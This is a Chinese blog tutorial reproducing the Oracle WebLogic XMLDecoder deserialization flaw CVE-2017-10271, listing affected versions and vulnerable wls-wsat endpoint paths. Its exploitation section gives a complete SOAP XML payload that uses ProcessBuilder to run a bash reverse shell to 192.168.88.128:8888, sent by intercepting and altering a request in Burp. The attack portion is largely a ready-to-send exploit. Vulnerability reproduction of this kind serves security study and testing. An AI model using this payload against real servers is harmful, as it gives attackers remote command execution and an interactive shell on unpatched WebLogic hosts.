Weblogic XML反序列化漏洞 [CVE-2017-10271]

漏洞环境搭建请参考

http://t.csdnimg.cn/i11e2

漏洞原理

Weblogic的wls security组件对外提供webservice服务,wls security组件使用了xmldecoder来解析用户传入的xml数据,如果用户进行xml恶意数据的构造,即可触发反序列化漏洞

漏洞版本

OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0

漏洞验证

(1)访问web站点,weblogic经典页面

(2)weblogicscan扫描,发现存在漏洞,进行CVE-2017-10271的复现操作

(3)或者访问以下组件地址,出现以下页面证明存在该漏洞

python 复制代码
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

漏洞利用

(1)攻击机开启监听

(2)在该组件页面进行F5刷新,Bp抓包

(3)修改数据包的提交方式为POST,并且加入以下payload

python 复制代码
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.88.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

(4)放包即可拿到反弹shell

相关推荐
小刘鸭地下城1 小时前
内容安全策略(CSP)深度指南:从基础配置到高级防护
安全
内心如初7 小时前
应急响应事件处理(网络安全体系架构与应急响应的前置知识)
安全·web安全
Teamhelper_AR8 小时前
AR眼镜:化工安全生产的技术革命
安全·ar
zz-zjx8 小时前
堡垒机安全架构:从零搭建企业级防护(单节点版)
安全·ssh·安全架构
纪元A梦8 小时前
Redis最佳实践——安全与稳定性保障之高可用架构详解
redis·安全·架构
一枚前端小能手8 小时前
🛡️ Token莫名其妙就泄露了?JWT安全陷阱防不胜防
前端·javascript·安全
lypzcgf10 小时前
Coze源码分析-资源库-创建知识库-基础设施/存储/安全
安全·go·coze·coze源码分析·智能体平台·ai应用平台·agent开发平台
阿部多瑞 ABU10 小时前
《学校机房终端安全全链条攻防分析与防御体系建设报告》
网络·安全
汉堡包00110 小时前
【靶场练习】--DVWA第一关Brute Force(暴力破解)全难度分析
学习·安全
Suckerbin19 小时前
TBBT: FunWithFlags靶场渗透
笔记·安全·web安全·网络安全